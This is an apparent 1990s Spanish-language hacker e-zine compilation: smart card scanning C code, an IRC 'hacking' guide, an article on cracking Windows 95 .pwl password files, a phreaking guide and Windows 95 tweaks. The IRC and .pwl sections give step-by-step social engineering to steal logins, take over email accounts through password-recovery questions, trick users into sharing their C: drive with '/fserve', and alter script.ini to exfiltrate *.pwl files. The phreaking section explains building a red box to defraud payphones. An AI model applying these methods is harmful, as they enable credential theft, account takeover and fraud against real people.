- while (SIO_ReadChar(s)!=-1)
- ;
- reset_done++;
-
- if (dbglev) {
- SLOG_printf(outf,"CLA 0x%02x: SKIPPING with RESET\n",i);
- }
-
- /* skip to next INS */
- continue;
- }
- return (-1);
- }
- goto do_again;
- }
-
- /* process the result ... 6e 00 means the class doesn't exist */
- if (buf[0]!=0x6e)
- classlist[i]=1;
- else
- classlist[i]=0;
-
- reset_done=0;
-
- }
- return(1);
- }
-
- int SCT0_ScanInstructions(SIO_INFO *s,char theclass,char *inslist)
- {
- int i,j,len;
- unsigned char buf[BUFSIZ];
- int retries;
-
- if (dbglev)
- SLOG_printf(outf,"INS scan for CLASS 0x%02x\n",theclass & 0xff);
-
- /* flush data ... read until nothing available */
- while (SIO_ReadChar(s)!=-1)
- ;
-
- retries=0;
-
- for(i=0;i<=255;i++) {
- do_again: ;
- buf[0]=theclass; /* CLA = 0 */
- buf[1]=i; /* instruction */
- buf[2]=0x0;
- buf[3]=0x0;
- buf[4]=0x0;
- len=SIO_WriteBuffer(s,buf,5);
-
- /* we need to delay before reading to give the reader time
- * to start responding
- */
- SIO_Delay(s,100);
-
- /* now read in some data */
- for(j=0;j<2;j++) {
- len=SIO_ReadBuffer(s,buf,sizeof(buf));
- if (len>0)
- break;
- }
-
- if (dbglev) {
- SLOG_printf(outf,"INS 0x%02x: (%d) ",i,len);
- SLOG_dump(outf,buf,len,0);
- SLOG_printf(outf,"\n");
- }
-
- /* we could get back a response to a command that didn't
- * need any parameters ... which we should handle
- */
- if (len==3) {
- if ((buf[0] & 0xff)==i) {
- /* process the result ... 6e 00 or 6d 00 means the instruction
- * doesn't exist ... 6d=unknown, 6e=wrong
- */
- if ((buf[1]!=0x6e)&&(buf[1]!=0x6d))
- inslist[i]=1;
- else
- inslist[i]=0;
- continue;
- } else {
- /*
- SLOG_printf(outf,"len=3 i=0x%x buf[0]=0x%x\n",i,buf[0]);
- */
- }
- }
-
- if (len!=2) {
- if (retries++>MAX_RETRIES)
- return (-1);
- goto do_again;
- }
-
- /* process the result ... 6e 00 or 6d 00 means the instruction
- * doesn't exist ... 6d=unknown, 6e=wrong
- */
- if ((buf[0]!=0x6e)&&(buf[0]!=0x6d))
- inslist[i]=1;
- else
- inslist[i]=0;
-
- }
- return(1);
- }
-
- int SCT0_ScanFiles(SIO_INFO *s,char theclass,char thefile,char *filelist)
- {
- int i,j,len;
- unsigned char buf[BUFSIZ];
- int retries;
-
- if (dbglev)
- SLOG_printf(outf,"FILE scan for CLASS 0x%02x file 0x%02x\n",
- theclass & 0xff, thefile & 0xff);
-
- /* flush data ... read until nothing available */
- while (SIO_ReadChar(s)!=-1)
- ;
-
- retries=0;
-
- for(i=0;i<=255;i++) {
- do_again: ;
- buf[0]=theclass; /* CLA = 0 */
- buf[1]=0xa4; /* instruction */
- buf[2]=0x0;
- buf[3]=0x0;
- buf[4]=0x2;
- len=SIO_WriteBuffer(s,buf,5);
-
- /* we need to delay before reading to give the reader time
- * to start responding
- */
- SIO_Delay(s,100);
-
- /* now read in some data - which should be the INS */
- for(j=0;j<2;j++) {
- len=SIO_ReadBuffer(s,buf,sizeof(buf));
- if (len>0)
- break;
- }
-
- if (dbglev) {
- SLOG_printf(outf,"FILE 0x%02x: (%d) [INS] ",i,len);
- SLOG_dump(outf,buf,len,0);
- SLOG_printf(outf,"\n");
- }
-
- if (len!=1) {
- if (retries++>MAX_RETRIES)
- return (-1);
- goto do_again;
- }
-
- /* we must get the INS back or things are broken! */
- if (buf[0]!=0xa4) {
- if (dbglev)
- SLOG_printf(outf,"ScanFiles - didn't get back INS - aborting scan\n");
- return (-1);
- }
-
- /* now send the file ID */
- buf[0]=thefile;
- buf[1]=i;
- len=SIO_WriteBuffer(s,buf,2);
-
- /* we need to delay before reading to give the reader time
- * to start responding
- */
- SIO_Delay(s,100);
-
- /* now read in some data - which should be the response code */
- for(j=0;j<2;j++) {
- len=SIO_ReadBuffer(s,buf,sizeof(buf));
- if (len>0)
- break;
- }
-
- if (dbglev) {
- SLOG_printf(outf,"FILE 0x%02x: (%d) [RES] ",i,len);
- SLOG_dump(outf,buf,len,0);
- SLOG_printf(outf,"\n");
- }
-
- if (len!=2) {
- if (retries++>MAX_RETRIES)
- return (-1);
- goto do_again;
- }
-
- /* process the result
- * 61 xx is okay with length (Schlumberger Cryptoflex)
- * 9x 00 is okay (Chipknip?)
- */
- if ( (((buf[0] & 0xf0)==0x90) && (buf[1]==0)) ||
- (buf[0]==0x61) ) {
- filelist[i]=1;
- /* now we need to select the MF again otherwise we can end
- * up confused with going down a directory level which isn't
- * what we want
- */
- } else
- filelist[i]=0;
-
- }
- return(1);
- }
-
- int SCT0_ScanForResponse(SIO_INFO *s,char *ubuf,int ubufsiz)
- {
- long aspeed;
- int aparity,adatabits,astopbits,aiomode;
- char buf[256];
- int len,j;
-
- /* for(aspeed=0;aspeed<N_all_speed;aspeed++) */
-
- aspeed=0;
-
- for(adatabits=0;adatabits<N_all_databits;adatabits++)
- for(astopbits=0;astopbits<N_all_stopbits;astopbits++)
- for(aparity=0;aparity<N_all_parity;aparity++)
- for(aiomode=0;aiomode<N_all_iomode;aiomode++) {
- SIO_SetSpeed(s,all_speed[aspeed]);
- SIO_SetDataBits(s,all_databits[adatabits]);
- SIO_SetStopBits(s,all_stopbits[astopbits]);
- SIO_SetParity(s,all_parity[aparity]);
- SIO_SetIOMode(s,all_iomode[aiomode]);
- SIO_WriteSettings(s);
-
- len=SIO_WriteBuffer(s,ubuf,ubufsiz);
-
- /* we need to delay before reading to give the reader time
- * to start responding
- */
- SIO_Delay(s,100);
-
- /* now read in some data - which should be the INS */
- for(j=0;j<2;j++) {
- len=SIO_ReadBuffer(s,buf,sizeof(buf));
- if (len>0)
- break;
- }
-
- if (1||dbglev) {
- SLOG_printf(outf,"settings: %s\n",SIO_GetSettingsString(s));
- SLOG_printf(outf,"RESPONSE TO COMMAND\n");
- SLOG_dump(outf,buf,len,0);
- SLOG_printf(outf,"\n");
- }
-
- }
- return(0);
- }
-
- ------------ FIN -------------------------------------------------------------
-
- Pues disfrutarlo y sed inteligentes con el codigo fuente, lo
- recomendable seria que pasarais por el website del CCC y tambien por los
- url∩s que se indican en el File Readme.gsm. Byes.
-
- - J.J.F. / HACKERS TEAM -
-
- <────────────────────────────────────────────────────────────────────────────>
- ██████████████████████████████████████████████████████████████████████████████
- <────────────────────────────────────────────────────────────────────────────>
-
- heres libre de poner esto en tu pagina web, distribuirlo en bbs o de
- la forma que tede la gana 'siempre y cuando respetes este encabezado' texto
- escrito,maquetado,y todo lo demas por: ZeD
- dudas comentarios,etc.. a zed@mixmail.com-------
- www.angelfire.com/ak/HACKZED/ZED2.html
- miembro del HaCk`S-wEb-RiNg=http://come.to/HaCkS-wEb-RiNg
- ------------------------------------------------------------------------------
-
- ###############################################
- # ¿QUE SE PUEDE HACER EN EL IRC? #
- ###############################################
- POR: ZeD
-
- Hay mucha gente (la mayoria) que se mete en el Irc,para conversar con
- gente de otros paises o ciudades,en realidad para eso se creo el Irc
- (Internet Relay Chat).
- Luego con la aparicion de los primeros script`s para el Irc, se
- empezaron a pasar fotos, y otras clases de archivos gracias a la opcion de
- "f-server",que aportaban estos. Mas tarde se empezaron a crear las primeras
- "armas" (y defensas),para lo que hoy denominados "Irc-War",de todos es
- conocido el "Winnuke",y todos (o la mayoria) de los script`s modernos
- incluyen alguna opcion referente al "Irc-War".
- Vale,todo esto esta muy bien,pero.... (ahora llega lo bueno del Irc)
- al conocer a tanta gente,muchas veces (la mayoria),nos cruzamos con el
- tipico tiparraco que se las da de listo y que dice que se sabe todos los
- trucos (en realidad no saben ni de lo que les hablas la mayoria de las
- veces),y lo mejor que puedes hacer con esta gente es aprovecharte de su
- "sabiduria". ¿Para que?,pues para conseguir passwords, loggins, direcciones
- y si te lo montas bien lo que le quieras sacar.
- El perfil de estos individuos suele ser un caracter alegre y muy
- hablador, aqui esta su mayor punto debil. Hablan y la mayoria de las veces
- lo hacen demasiado, aqui es donde entras tu.
- Desde luego si al tio (por muy tonto que sea), le entras diciendole lo
- tipico de: "oye veras esque se me a jodido un archivo del Gⁿindows, y queria
- saber si me podias pasar el tuyo, es un archivo que esta en la carpeta de
- windows, tiene de extension .pwl", el tio lo mas probable es que desconfie y
- o te ignore, o que te diga que usa el "Nt".
- Tienes que usar todo tu ingenio y astucia para hacerte "colegilla"
- sullo. Lo primero que debes hacer es ponerte otro nick que no vallas a usar
- nada mas que cuando vallas a hablar con el, ademas para que sea mas creible
- este nick estaria bien que fuese algo normal como: latino, juan y cosas asi.
- No te pongas El_Se╤oR_dEl_dEsAsTrE, por que lo mas probabla es que te
- mande a freir monas. Entra en canales donde habitualmente la gente no sea
- muy experta en ordenadores,como #sexo o #fotoxXx, aqui es donde la gente
- mas se enrolla y es de donde puedes sacar mas probecho de tu tiempo.
- Lo siguiente es usar algo de "ingenieria social". si le entras al tio
- como te he dicho antes no te hara ni caso, lo mejor que puedes hacer es, por
- ejemplo si estas en un canal de fotoxXx intentar conseguir el pass y el
- logging de alguna pagina porno yaque en esta clase de canales hay muchas
- personas que son socias de alguna pagina X.
- por ejemplo digamos que has localizado a un tio que crees que pueda
- ser socio de la pagina depago del Play Boy, un ejemplo de como conseguir su
- pass y su loggin seria esta conversacion en un chat privado: (tu heres juan
- y el pepe)
-
- ->juan: oye he estado viendo las fotos que me has cambiado y me he dado
- cuenta de que hay muchas del Play Boy ¿de donde las has sacado?
- ->pepe: de la pagina
- ->juan: ¿heres socio?
- ->pepe: si
- ->juan: joder pues tienes que tenr mogollon de pelas, por que eso tiene que
- salir caro ¿no?
- ->pepe: no te creas solo cobran 25$ al mes
- ->juan: hombre barato, barato, no es... ¿que tuviste que hacer para hacerte
- socio?
- ->pepe: pues poca cosa, rellene un formulario de inscripcion y a los dos
- dias ya tenia mi clave y mi nombre de usuario
- ->juan: a mi hace unos dias me dieron un nombre y una clave, pero ya no
- funcionaba
- ->pepe: es posible, los cambian cada 2 semanas
-
- aqui ya te has enterado de que las claves de acceso a la pagina de
- socios del Play Boy las cambian cada 2 semanas
-
- ->juan: ¿y como os las comunican por e-mail?
- ->pepe: si
-
- ahora lo que tienes que conseguir es que te de su direccion de e-mail,
- si tienes suerte a donde se lo manden sera a un servicio de e-mail gratuito
- tipo "latinmail". Esto pasa asi la mayoria de las veces debido a que el
- correo tambien lo use su padre, y no creo que le agrade ver como su hijo se
- gasta la paga en pagar un acceso a una pagina pornografica. La mayoria de
- los servicios gratuitos de e-mail disponen de un servicio extra de
- "recordatorio de contraseñas" a la que puedes acceder si pones la direccion
- de e-mail (pepe@latinmail.com por ejemplo), y su grupo preferido de musica.
- En estos casos mientras estas hablando con el lo mejor que puedes
- hacer escuando te de su direccion de e-mail, visita su servidor y veras si
- la direccion de e-mail es de uno de estos servios gratuitos. Si no es asi
- intenta sonsacarle a que direccion de e-mail le mandan los passwords.
- Pongamos que se lo mandan a la cuenta "pepe@latinmail.com" y que ese
- servicio de e-mail gratuito pone a disposicion de los usuarios el
- "recordatorio de contraseña".
- Hazte una cuenta en ese servidor para ver si ofrece ese servicio o no
- lo ofrece. Si lo hace (que sera lo mas probable), mira las opcion es que te
- da para recordarte la contraseña. Pongamos que te dan las opciones: "tu
- grupo de musica favorito", "la marca de yogures que compra tu madre" y "el
- nombre de tu discoteca favorita", vale ahora lo que tienes que hacer es,
- averiguar todas esas cosas que te dan opcion a recordar la contraseña de el.
- Una vez que lo hayas logrado intenta entrar en su cuenta de e-mail y
- si lo logras (que sera lo mas probable), intenta averiguar mas o menos
- sobre que dia le mandan los passwords, y listo a entrar en su cuenta de
- e-mail los dias que se las manden, y copiar el loggin y el password, pero
- ojo, no le borres los mensajes que le llegen con los passwords o se olera
- que alguien los a pillado y cambiara su cuenta de e-mail.
-
- Otra de las cosas que se pueden conseguir en el Irc, son los ya
- famosos ".pwl", que guardan las contraseñas del Gⁿindows, esto ultimamente
- se a convertido en algo dicifil de conseguir por que ya lo sabe todo el
- mundo pero prueba por si acaso.
- Pero claro un .pwl, si no lo "descompilas" y lo pasas a codigo
- "legible" no te vale para nada. Ahorate voy a enseñar como conseguir usar
- el ".pwl", que con tanto esfuerzo has conseguido sacarle a un pive que se
- conectaba desde una universidad (por ejemplo) (si heres universitario,
- estas de suerte. Pilla todos los ".pwl" que puedas de los ordenadores que
- esten conectados a una red o no, y a disfrutar cambiandote las notas o
- pillando el examen que tienes la semana que viene)
-
- Bueno supongo que ya tienes el .pwl del ordenador de tu universidad
- objetivo, bien ahora te estaras preguntando "¿y que coño hago yo con esto?",
- pos te lo explico ahora mismo :) .
- Lo primero que tienes que hacer es copiar las d.n.s de la universidad
- (o de donde sea el pwl) por que si no de poco te va a servir desencriptarlo.
- Vale supongo que ya tienes todo lo necesario de momento, osea el pwl,
- y las d.n.s. Bien ahora lo que tienes que hacer es lo sieguiente.
- La parte del texto que aqui se expone la ha hecho ToMaCHeLi y la voy
- a poner literalmente, tambien puedes bajarte el texto por separado en la
- pagina del HaCk`S-wEb-RiNg http://come.to/HaCkS-wEb-RiNg
- ------------------------------------------------------------------------------
-
- @@@@@@@@@
- By ToMaCHeLi @ PWL's @ By ToMaCHeLi
- @@@@@@@@@
- ------------------------------------------------------------------------------
- 1.- Introduccion.
- 2.- Que son?.
- 3.- Como conseguirlos.
- 4.- Como desencriptarlos.
- ------------------------------------------------------------------------------
-
- 1.- Introduccion:
- -----------------
-
- Bueno ante todo me he decidido a escribir este articulo para que
- veais la gran seguridad que tiene Windows 95 (ventanucos pa los amigos).
- Asi es que piensate antes de ponerte el Windows 98 (mas de lo mismo
- seguro).
-
- 2.- Que son?:
- -------------
-
- Los PWL's son archivos donde Windows 95 guarda todas las contraseñas
- del sistema (eso si para que queden almacenadas debes seleccionar el cuadro
- donde pone "Guardar contraseña"). Ejemplos pueden ser la contraseña de
- entrada a Windows 95, contraseña de entrada a una carpeta compartida en una
- red LAN, y algunas mas. Pero lo que mucha gente no sabe es que la propia
- contraseña de entrada a INTERNET se guarda en este archivo, incluido
- tambien el nombre de usuario.
-
- 3.- Como conseguirlos:
- ----------------------
-
- Si sigues leyendo esto veo que te interesa, jeje. Estos archivos se
- encuentran en el directorio principal de Windows 95 que normalmente sera
- c:\windows. Para empezar a practicar un poco puedes coger tus propios PWL
- que tendras en el directorio antes mencionado, y si quieres arriesgarte un
- poco mas puedes intentar conseguir PWL's de otras maquinas.
- Si tienes acceso al ordenata de la universidad donde estudias, de un
- conocido (no amigo, que eso esta mu mal), de una feria de ordenatas, etc..
- pos nada chico pilla los PWL (pero que no te pillen pillandos jeje, Ah! y
- esto yo no te lo he dicho) ;). Tambien puedes intentarlo por el IRC mediante
- ingenieria social (que no sabes lo que es????, ¿que haces leyendo esto tio?
- dejalo ya...) u otras tecnicas que sepas...
-
- 4.- Como desencriptarlos:
- -------------------------
-
- Asi que ya tienes los archivitos eh?, entonces manos a la obra. Las
- maneras de desencriptarlos son diversas pero la mas facil que he encontrado
- es utilizando un par de herramientas destinadas para ello. Estas
- herramientas son el GLIDE y el PWLTOOL (cada una de ellas tiene sus
- ventajas e inconvenientes). Para usarlas yo recomiendo lo siguiente:
-
- Supongamos que tenemos el archivo Tom.pwl Lo primero que haria seria
- utilizar el GLIDE para ver si dentro de este archivo hay passwords para
- ello deberia verse algo asi al final del archivo:
-
- Recource[5] (2)
-
- Recource[6] (2)
-
- Recource[7] (2)
-
- Recource[8] (2)
-
- Recource[9] (2)
-
- Recource[10] (50)
- 0 -3*Rna\Servicom\a3004773@servicomA2D41B37
- Recource[11] (2)
-
- Recource[12] (2)
-
- Recource[13] (54)
- 2 $ Todo -0e¡y├▌ñ«╤∙ OIOI≡gADMIN
- Recource[14] (2)
-
- Recource[15] (2)
-
- (Esos simbolos raros quieren decir que aqui existen passwords).
-
- Aqui lo importante seria:
- -------------------------
-
- Nombre de usuario: a3004773@servicom
- Password: A2D41B37
-
- (Esto es la conexion a INTERNET a traves de Servicom)
- (NO es verdadera por supuesto) :)
- ------------------------------------------------------------------------------
-
- Si no existen passwords en el archivo (que tambien puede ser) se
- veria asi: (si te sale esto tira a la papelera el PWL) :))
-
- Recource[5] (2)
-
- Recource[6] (2)
-
- Recource[7] (2)
-
- Recource[8] (2)
-
- Recource[9] (2)
-
- Recource[10] (50)
-
- Recource[11] (2)
-
- Recource[12] (2)
-
- Recource[13] (54)
-
- Recource[14] (2)
-
- Recource[15] (2)
-
- (aqui no hay passwords).
-
- Aqui lo importante seria:
- -------------------------
-
- NADA NADA NADA NADA NADA NADA NADA NADA NADA Y NADA
-
- -----------------------------------------------------------------------------
-
- Y te preguntaras, si ya aparece la password de INTERNET y el nombre
- de usuario con el GLIDE pa que usar el PWLTOOL????. Te explico, tengo
- comprobado que cuando la password de INTERNET supera los 8 digitos a partir
- del digito 8 ya no apareceran los restantes (joer explicate). Por ejemplo:
-
- Password verdadero : 795342A3B5
- Password que aparece con el GLIDE: 795342A3
-
- (fijate falta el B5)
-
- Pues este es el inconveniente que tiene el GLIDE y por eso se utiliza
- el PWLTOOL.
- Pero con este hay otro pequeño inconveniente, resulta que para que
- salgan todos los password que hay dentro del PWL se necesita el password de
- entrada a Windows 95 (joer que lio).
- Ejemplo, tenemos el archivo Toma.pwl, este archivo debes ponerlo en
- el directorio de windows del ordenata de tu casa por ejemplo, despues
- reinicias el equipo para que te pida contraseña de entrada al equipo (esto
- activalo en el panel de control-contraseñas), cuando te pida el nombre de
- usuario pon Toma (se me olvidava en los PWL el nombre del archivo es siempre
- el nombre del usuario, ejemplo Toma.pwl Nombre de usuario: Toma).
- Ahora viene lo malo, sabes la contraseña de ese nombre de usuario??,
- si la sabes la pones y ya esta entras en Windows 95 ejecutas el PWLTOOL y ..
- TACHAN!!! todas las passwords que contiene el PWL te seran desveladas sin
- el inconveniente que tiene el GLIDE (lo de los 8 digitos, recuerdas??).
-
- (Pa los que no tienen la contraseña del nombre de usuario de windows)
- Pero y si no sabes la contraseña de entrada a Windows con ese nombre
- de usuario??
- Arggg, eso se complica, entonces deberas usar el PWLTOOL en el que
- una de sus opciones es la de utilizar un diccionario de palabras para sacar
- la contraseña del nombre de usuario del archivo PWL (y esto no es facil...,
- pero se puede conseguir).
- Tambien puedes pensar otras maneras de utilizar el PWLTOOL pero eso
- te lo dejo a ti no te voy a decir todo macho (o gachi lo que seas, una gachi
- hacker??, que raro no hay muchas...).
-
- Por mi parte es todo, espero que os haya servido de ayuda todo este
- rollo. Si algunno quiere añadir o corregir algo que me avise.
-
- ******************************************************************************
-
- Este articulo es de libre distribucion (siempre que no modifiques
- nada, o te buscare hasta la muerte jeje), ademas no me hago responsable de
- lo que puedas llegar a cometer con su contenido.
-
- ******************************************************************************
-
- Articulo realizado para el grupo Hack's-Web-Ring.
-
- Realizado por:
-
- --- ToMaCHeLi ---
-
- WEB: http://members.tripod.com/~tomacheli
-
- MAIL: tomacheli@geocities.com
-
- Un saludo pa todos los del grupo :)
- -----------------fin del texto escrito por ToMaCHeLi--------------------------
-
- bien despues de esto supongo que estras deseando entrar en el Irc y
- empezar a actuar, pero antes de hacer eso te recomiendo que sigas leyendo
- por que voy a pasar a explicarte algunos trucos quete facilitaran la vida
- en el Irc.
- Muchas veces lo de la ingenieria social no funciona y pillar un pwl
- apartir de este metodo se esta convirtiendo cada dia mas dificil, pero
- existe un comando que te puede facilitar las cosas por que no todo el mundo
- lo conoce (y sobre todo los novatos) el comando en cuestion es el
- siguiente: /fserve el_nick_que_uses 5 c:\
- si haces que un usuario ponga este comando en el canal, privado,
- Dcc-chat.... lo que hara este comando es darte acceso a su unidad c:\, el
- pequeño inconveniente que tiene esto es que el pive antes de darte acceso
- le saldra un mensage que le dira que te va a dar acceso a su unidad c:\, el
- mensage en cuestion sale en ingles, osea que si tienes suerte y el pive no
- controla mucho ingles, pasara de leer el mensage y aceptara sin pedirte
- ninguna explicacion.
- Seguro que has oido hablar del archiconocido "virus" del "script.ini"
- como sabras este "virus" lo que hace es que cuando entras en un canal
- enviasa todos los alli presentes este archivo, pero.... ¿has probado a
- modificar este "ini" para que envez de mandar el "script.ini", mande el
- "c:\windows\*.pwl"? investiga que esto puede ser muy interesante.
- Otra opcion que tienes si tienes algo de idea de "scripting" es
- modificar la parte del fserver del script que uses para que envez de que
- cuando te den acceso a un fserver en la carpeta que ellos elijan te lo den
- en "c:\" o en "c:\windows", esto no se de que manera se puede hacer,
- pero me han dicho que si se puede,osea que andaros al loro y echad un
- vistazo de vez encuando a las personas que esten en vustro fserver, para ver
- por donde andan y lo que se estan bajando.
-
- pues eso es todo, si tienes alguna duda, sugerencia o simplemente
- quieres decirme algo referente a este texto, puedes hacerlo escribiendo a:
- zed@mixmail.com
- !!feliz irc-hack a todos¡¡
-
- <────────────────────────────────────────────────────────────────────────────>
- ██████████████████████████████████████████████████████████████████████████████
- <────────────────────────────────────────────────────────────────────────────>
-
- ZeD no se hace responsable de las consecuencias que te pueden suceder
- si usas mal cualquier informacion aqui dada, pero te recomienda que no uses
- nada de lo aqui escrito (por tu bien)
- puedes subir este texto a tu web, bbs o distribuirlo de la manera que
- te de la gana siempre y cuando mantengas este encabezado, no alteres ninguna
- parte del texto y me avises antes a zed@mixmail.com
- ------------------------------------------------------------------------------
-
- ##############################################
- # PHREACKING PARA NOVATOS #
- ##############################################
- por ZeD---http://www.angelfire.com/ak/HACKZED/ZED2.html
- ---http://come.to/HaCkS-wEb-RiNg
- (miembro del HaCk`S-wEb-RiNg)
-
-
- 1.¿que es phreackear?
- 2.¿por que phreackear?
- 3.reglas
- 4.¿como empezar en esto del phreacking?
- 5.descripcion brebe de las BOXES
- 6.RED-BOXING
- 7.despedida y cierre
- ------------------------------------------------------------------------------
-
- 1. ¿QUE ES PHREACKEAR?
-
- phreackear es simplemente hacer cualquier tipo de llamadas
- (provinciales, internacionales) completamente sin pagar un duro, tener un
- conocimento + o - completo de la red de telefonia y de que se puede hacer
- con ella, como usar determidas cosas para no pagar un servicio que deveria
- ser mucho mas barato, ya que es algo que se ha convertido en algo
- INPRESCINDIBLE.
-
- 2. ¿POR QUE PHREACKEAR?
-
- la explicacion es muy simple,piensalo de esta manera: ¿por que tengo
- que pagar una factura que cada dia es mas elevada por usar un SERVICIO de
- maxima NECESIDAD? ¿por ademas de ahorrar pagar la luz el agua...etc... que
- tambien son SERVICIOS de maxima NECESIDAD, tambien lo tengo que hacer para
- pagar el telefono? pues por una razon muy simple, las compañias telefonicas
- abusan de los consumidores que usan un SERVICIO cobrandoles mucho mas de lo
- que deveria costar, solo por que es NECESARIO, ademas, ellos nos engañan
- con "PLANES CLAROS" y demas jilipolleces que luego siempre son mentira, ¿por
- que no les vas a poder engañar tu a ellos tambien?
-
- 3. REGLAS DEL PHREACKING
-
- como en todo, aqui tambien hay que seguir unas reglas, que mas que
- PENALES, son MORALES.
-
- 1- no uses nunca una BOX con tu propia linea telefonica (seria de tontos
- hacerlo)
- 2- no hablar de tus proyectos phreackers por telefono (lo mismo de arriba)
- 3- no uses tu nombre real cuando estes haciendo phreack (no tengo que
- decirtelo ¿verdad?)
- 4- todos los materiales que uses debes guardarlos en buen sitio, no es
- conveniente que vallas dejando las cosas por hay tiradas para que la
- gente las vea
- 5- (y aunque se contradiga con la primera) no es bueno joder a otra persona,
- que como tu esta siendo abusado por una compañia telefonica, intenta usar
- siempre lineas de empresas multimillonarias o cosas asi (aunque esto
- conlleva un mayor riesgo claro)
-
- 4. ¿COMO EMPEZAR EN ESTO DEL PHREACKING?
-
- lo primero que tienes que hacer es construir los BOXES que vallas a
- usar en tus "sesiones" de todas maneras si tienes problemas al construirlos
- siempre hay otras alternativas... ;-) para empezar a phreackear lo que
- tienes que hacer es elejir bien los sitios donde lo vallas a hacer, como
- heres nuevo en esto, tardaras algo mas de tiempo que uno que ya controla
- del tema por lo tanto te recomiendo que uses sitios poco transitados y que
- lo hagas siempre de noche.
-
- 5. DESCRIPCION DE LAS BOXES
-
- nombre de la BOX UTILIDAD
- --------------------- ----------------
-
- RED-BOX-------------------genera tonos para llamadas gratis
- BLACK-BOX-----------------cuando se llama,el que llama no paga un duro
- BEIGE-BOX-----------------llamas con la linea de otra persona(la unica que
- funciona en españa)
- GREEN-BOX-----------------genera tonos de llamada a cobro revertido
- CHEES-BOX-----------------cambia tu telefono a modo "cabina telefonica"
- ACRILIC-BOX---------------roba 3 vias de linea
- WATER-BOX-----------------detine el rastreo de la policia
- BOX-LANZAMIENTO-----------amplificador para el microfono del telefono
- BOX-BORRON(near)----------corta todas las lineas de tu area
- MAROON-BOX----------------crea una "party line"
- BOX-BROTE-----------------llama a los telefonos de tus vecinos
- CHROME-BOX----------------manipula las señales de trafico
- BOX-CLARA-----------------llamdas gratis
- COLOR-BOX-----------------graba las conversaciones telefonicas
- BOX DE COBRE--------------causa interferencias entre dos lineas que se esten
- usando
- INFINITE-BOX--------------telefono de uso remoto
- BOX-ARCO IRIRIS-----------corta cualquier rastreo en la linea
-
- existen mas boxes pero estas son las mas interesantes.
-
- 6. RED-BOXING
-
- aqui te voy a explicar como hacer una red-box: lo primero que tienes
- que hacer es ir a tienda de radio y comprar un dialer que sea de tonos (un
- marcador de tonos valla) y un cristal de 6,5536 Mhz abre el marcador y
- quita el cristal que lleva, ahora mete el de 6,5536 Mhz (el que has
- comprado tu) cierras el marcador y EVOILA ya tienes tu red-box.
- estos es muy bonito ¿pero como lo uso ahora? te estaras preguntando
- (joder que impacientes sois) para hacerlo funcionar tienes que hacer lo
- siguiente: cuando te pidan 25pts para la llamada en el marcador tienes que
- pulsar "5*'s" por ejemplo (sin las comillas obviamente) cuando son 5pts
- "1*." cuando son 10pts hay que marcar "3*'s" y asi ¿a que no es dificil?
-
- 7. DESPEDIDA Y CIERRE
-
- bueno pues esto es todo espero que esto te aya servido de referencia
- si estas empezando en esto del phreacking y si ya eres un entendido para
- recordarte algo que se te avia olvidado, en fin que me aya tirado 15
- minutos, para que valga de algo joñe
- bueno si me quereis comentar algo ya sabeis que podeis escribirme a
- zed@mixmail.com y que todo lo que he dicho a qui no es mas que una guia
- para que aprendas, pero no para que uses lo que aprendas 8-), pero si lo
- haces....aya tu bye
-
- <────────────────────────────────────────────────────────────────────────────>
- ██████████████████████████████████████████████████████████████████████████████
- <────────────────────────────────────────────────────────────────────────────>
-
- ############################################
- # como trucar el Gⁿindows95 #
- ############################################
-
- texto escrito por ZeD--www.angelfire.com/ak/HACKZED/ZED2.html
- --http://come.to/HaCkS-wEb-RiNg
- puedes subir este texto a tu web,bbs,ftp o lo que sea,siempre que mantengas
- este encabezado.
- ACTUALIZACION:10/8/98
-
-
- ZeD no se hace responsable de los daños que el uso de este documento
- pueda ocasionar a tu pc y te recomienda siempre hacer copias de seguridad
- (por si las moscas)
-
- INDICE:
- 1.como trucar el internet explorer
- 2.pon el nombre que quieras a la papelera de reciclaje
- 3.cambia el icono de las carpetas por el que tu quieras
- 4.interface de 3.11 en w95
- 5.crear un acceseo directo para apagar el pc
- 6.cambiar el nombre de "mi pc"
- 7.MS2.sys
- 8.utilidades del sistema
- 9.PROXImamente
-
- ------------------------------------------------------------------------------
-
- 1.COMO TRUCAR EL INTERNET-EXPLORER v3.1 en adelante
-
- simpre has querido cambiar el dibujio de la "E" que sale cuando estas
- navegando con el internet-explorer, pues es bien simple.
- La imagen que sale es un archivo ".bmp" que esta en la carpeta
- ..../internet explorer/ son los archivos que se llaman "Ani38.bmp" y
- "Ani26.bmp" abrelos y mira como son. Veras que son como una tira que segun
- la vas bajando se convierte en una animacion. Vale pues ahora crea tu logo
- tal como esta definido en los archivos cambialo y ya tienes el explorer
- trucado (puedes bajarte algunas imagenes de mi pagina que esta en:
- www.angelfire.com/ak/HACKZED/ZED2.html,en la seccion "download")
-
- 2.COMO CAMBIAR EL NOMBRE A LA PAPELERA DE RECICLAJE
-
- cambiar el nombre de la papelera de reciclaje es muy simple: cambia
- el nombre en la clave del "regedit":(esta en la carpeta "windows")
- HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E
-
- 3.CAMBIAR EL ICONO DE LAS CARPETAS POR EL QUE TU QUIERAS
-
- para cambiar el icono que representa las carpetas tienes que hacer lo
- siguiente: Muchos de los iconos que por defecto traen algunos archivos se
- pueden cambiar simplemente desde cualquier carpeta, mediante el menu ver,
- luego opciones... , tipos de arhivos y por ultimo editar, e inmediatamente
- despues selecionar cambiar icono. Pero esto no siempre nos vale, sobre todo
- si queremos cambiar los iconos de por ejemplo, las carpetas, el menu de
- Inicio...
- Para ello el truco es el siguiente: Lo primero que tenemos que hacer
- es saber el icono que queremos cambiar... por ejemplo, para cambiar el
- icono de las carpetas, debemos ejecutar el registro, irnos a la seccion
- HKEY_CLASSES_ROOT\Folder\DefaultIcon en la parte derecha aparecera
- (preterminado) "C:\WINDOWS\SYSTEM\shell32.dll,3", la primera idea.. que no
- funciona :) es ir y cambiar directamente el valor de la cadena para poner
- el icono que queremos. Pero lo que tenemos que hacer es ir a la seccion
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ explorer y
- crear una nueva clave, Shell Icons, despues creamos un nuevo valor de la
- cadena, con el numero del icono indicado en el DefaultIcon que queremos
- cambiar, en nuestro caso el 3, seleccionamos este valor, pulsamos 2 veces y
- en Informacion del valor introducimos el path del archivo que tiene el
- icono que queremos poner, con su numero correspondiente. En mi caso es:
-
- nombre | datos
- (predeterminado) (valor no establecido)
- 3 "c\iconos\folders.icl,70"
-
- Bueno.. ya hemos hecho lo mas dificil. Pero aun queda algo mas.
- Windows 95 guarda una cache de Iconos en el directorio de instalacion del
- 95, llamado ShellIconCache, este archivo esta oculto. Debemos de borrar
